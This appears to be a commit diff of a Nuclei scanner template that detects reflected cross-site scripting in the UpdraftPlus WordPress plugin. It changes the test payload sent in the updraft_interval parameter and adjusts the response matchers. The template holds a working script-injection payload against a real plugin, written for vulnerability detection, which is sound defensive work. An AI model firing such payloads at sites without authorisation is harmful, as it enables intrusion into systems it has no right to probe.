commit
114e799792
|
@ -21,8 +21,8 @@ info:
|
||||||
epss-percentile: 0.62009
|
epss-percentile: 0.62009
|
||||||
cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:*
|
cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
|
||||||
max-request: 2
|
max-request: 2
|
||||||
|
verified: true
|
||||||
vendor: 'updraftplus'
|
vendor: 'updraftplus'
|
||||||
product: 'updraftplus'
|
product: 'updraftplus'
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
|
@ -37,19 +37,19 @@ http:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(document.domain)</script> HTTP/1.1
|
GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm('document_domain')</script> HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- '</script><script>confirm(document.domain)</script>'
|
- "<script>confirm('document_domain')</script>"
|
||||||
- 'updraftplus'
|
- "Existing backups"
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
|
Loading…
Reference in New Issue